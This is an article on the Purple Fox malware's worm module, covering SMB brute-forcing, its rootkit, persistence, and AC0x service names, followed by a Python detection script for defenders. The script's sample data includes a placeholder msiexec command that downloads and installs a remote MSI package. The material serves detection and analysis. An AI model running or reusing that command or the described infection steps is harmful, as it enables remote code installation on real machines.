Purple Fox is a well-known malware that was previously distributed through exploit kits and phishing emails, and it has now added a worm module that allows it to scan for and infect Windows systems.

It started as a downloader and later shifted to Windows PowerShell to retrieve and deliver its payloads. It comes with rootkit and backdoor capabilities and was first spotted in 2018, when it managed to infect more than 30,000 devices.

Starting in May 2020, Purple Fox attacks have intensified significantly, reaching 90,000 attacks and a 600% increase in infections, according to security researchers Amit Serper and Ophir Harpaz.

What devices are at risk?

When its scans find a Windows system reachable over the Internet, Purple Fox’s added worm module attempts to infect it by brute-forcing SMB passwords.

So far, the malware has deployed its droppers and additional modules on a large network of bots made up of around 2,000 compromised servers.

The devices in the botnet include Windows Server machines running IIS version 7.5 and Microsoft FTP, as well as servers running Microsoft RPC, Microsoft SQL Server 2008 R2, Microsoft HTTPAPI httpd 2.0, and Microsoft Terminal Service.

Purple Fox’s worm-like behavior lets it infect servers by brute-forcing vulnerable, Internet-exposed SMB services, but it still relies on phishing campaigns and web browser vulnerabilities to deploy its payloads as well.

Throughout our research, we have observed an infrastructure that appears to be made out of a hodge-podge of vulnerable and exploited servers hosting the initial payload of the malware, infected machines which are serving as nodes of those constantly worming campaigns, and server infrastructure that appears to be related to other malware campaigns.


How does the malware operate? 

Another notable thing Purple Fox does is install a rootkit module, based on the open-source "hidden" rootkit, in order to hide the dropped files and folders and the Windows registry entries it creates on infected systems.

After the rootkit has been deployed and the device rebooted, the malware renames its DLL payload to match a Windows system DLL and configures it to be launched at system start.


From this point on the malware runs at every system launch, so each infected system shows the same worm-like behavior: constantly scanning the Internet for other targets and trying to compromise them in order to add them to the botnet.

When a machine responds to the SMB probe sent to port 445, the worm tries to authenticate to SMB by brute-forcing usernames and passwords or by attempting to establish a null session.

If authentication succeeds, the malware creates a service whose name matches the regex AC0[0-9]{1} (e.g. AC01, AC02, AC05) that downloads the MSI installation package from one of the many HTTP servers, completing the infection loop.
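As an added illustration for defenders (not code from the article or from the researchers' report), the Python below correlates two signals the text describes: a burst of failed network logons against a host, which SMB brute-forcing produces, followed by the installation of a service named AC0x on that same host. The event records, host names, IP addresses and the service image path are constructed placeholders, not real telemetry or indicators.

```python
import re
from collections import Counter

# Constructed sample records (not real telemetry), shaped like the fields a SIEM
# extracts from Windows Security Event ID 4625 (failed logon; SMB brute force
# shows up as logon type 3) and System Event ID 7045 (new service installed).
FAILED_LOGONS = [
    {"id": 4625, "host": "srv01", "src_ip": "198.51.100.7", "user": u}
    for u in ["administrator", "admin", "guest", "backup", "sqlsvc", "test"]
] + [{"id": 4625, "host": "srv02", "src_ip": "203.0.113.4", "user": "jdoe"}]

SERVICE_INSTALLS = [
    # Name fits the article's pattern; the image path is a placeholder, not an IoC.
    {"id": 7045, "host": "srv01", "service": "AC05",
     "image": "C:\\Windows\\System32\\msiexec.exe /i http://<placeholder>/update.msi /q"},
    # AC012 would match the unanchored AC0[0-9]{1}; the anchored regex below rejects it.
    {"id": 7045, "host": "srv02", "service": "AC012", "image": "C:\\tools\\agent.exe"},
    {"id": 7045, "host": "srv03", "service": "BackupSvc", "image": "C:\\backup\\svc.exe"},
]
SAMPLE_EVENTS = FAILED_LOGONS + SERVICE_INSTALLS

# The article gives the service-name regex as AC0[0-9]{1}; anchoring it keeps
# longer, unrelated names such as AC012 from producing false positives.
SERVICE_NAME_RE = re.compile(r"^AC0[0-9]$")
BRUTE_FORCE_THRESHOLD = 5  # failed logons from one source IP against one host


def suspicious_services(events):
    """(host, service, image) for each 7045 event whose service name fits the pattern."""
    return [(e["host"], e["service"], e["image"])
            for e in events if e["id"] == 7045 and SERVICE_NAME_RE.match(e["service"])]


def brute_force_sources(events, threshold=BRUTE_FORCE_THRESHOLD):
    """(src_ip, host) pairs with at least `threshold` failed logons."""
    counts = Counter((e["src_ip"], e["host"]) for e in events if e["id"] == 4625)
    return sorted(pair for pair, n in counts.items() if n >= threshold)


def correlate(events, threshold=BRUTE_FORCE_THRESHOLD):
    """Hosts that saw both a brute-force burst and a matching service install."""
    bruted_hosts = {host for _, host in brute_force_sources(events, threshold)}
    return sorted({h for h, _, _ in suspicious_services(events) if h in bruted_hosts})


if __name__ == "__main__":
    for host in correlate(SAMPLE_EVENTS):
        print(f"{host}: SMB brute-force burst followed by AC0x service install")
```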

